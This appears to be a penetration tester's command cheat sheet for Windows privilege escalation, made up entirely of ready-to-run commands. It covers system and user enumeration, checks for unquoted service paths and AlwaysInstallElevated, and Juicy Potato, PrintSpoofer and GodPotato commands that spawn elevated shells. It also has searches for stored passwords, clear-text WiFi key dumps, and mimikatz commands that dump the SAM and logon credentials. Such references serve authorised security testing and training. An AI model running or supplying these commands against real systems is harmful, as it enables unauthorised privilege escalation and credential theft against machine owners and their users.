% privesc, windows, escalation

# System info
systeminfo

# Current user privileges
whoami /priv

# Current user groups
whoami /groups

# All users
net user

# User details
net user <username>

# Local groups
net localgroup

# Administrators group
net localgroup administrators

# Running services
wmic service list brief

# Installed patches
wmic qfe list

# Scheduled tasks
schtasks /query /fo LIST /v

# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"

# Find writable service directories
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"

# AlwaysInstallElevated check
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Stored credentials
cmdkey /list

# SAM and SYSTEM backup
dir C:\Windows\Repair\SAM
dir C:\Windows\System32\config\RegBack\SAM

# PowerUp
Import-Module .\PowerUp.ps1; Invoke-AllChecks

# WinPEAS
.\winPEASany.exe

# Juicy Potato (SeImpersonate)
.\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\shell.exe" -t *

# PrintSpoofer (SeImpersonate)
.\PrintSpoofer.exe -i -c cmd

# GodPotato (SeImpersonate)
.\GodPotato.exe -cmd "cmd /c whoami"

# Search for passwords in files
findstr /si password *.txt *.ini *.config

# Search registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Check saved WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="<wifi_name>" key=clear

# Dump SAM with mimikatz
mimikatz.exe "privilege::debug" "lsadump::sam" "exit"

# Dump credentials with mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

$ username: echo ""
$ wifi_name: echo ""